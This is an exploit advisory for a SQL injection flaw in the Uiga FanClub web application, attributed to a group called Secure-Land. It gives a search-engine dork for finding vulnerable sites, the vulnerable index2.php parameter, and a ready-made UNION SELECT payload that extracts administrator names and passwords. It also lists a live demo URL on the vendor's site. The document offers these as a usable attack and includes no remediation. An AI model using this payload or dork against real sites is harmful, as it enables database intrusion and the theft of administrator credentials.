########################################################################################
#                                                                                      #
# Exploit Title : Uiga FanClub Sql Injection Vulnerability                             #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Version       : All Version                                                          #
#                                                                                      #
# Vendor        : www.uiga.com                                                         #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : High                                                                 #
#                                                                                      #
# Dork          : intitle:"Uiga FanClub"                                               #
#                                                                                      #
########################################################################################
#                                                                                      #
#  Expl0iT:                                                                            #
#                                                                                      #
#                                                                                      #
#  http://[TarGeT]/[Patch]/index2.php?c=1&p=[SQL]                                      #
#                                                                                      #
#  +SQL :                                                                              #
#                                                                                      #
#  -1+union+select+1,group_concat(admin_name,0x3a,admin_password),3,4,5+from+admin     #
#                                                                                      # 
#  Demo :                                                                              #
#                                                                                      #
#  http://www.uiga.com/product/demo/uigafanclub/index2.php?c=29&p=[SQL]                #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################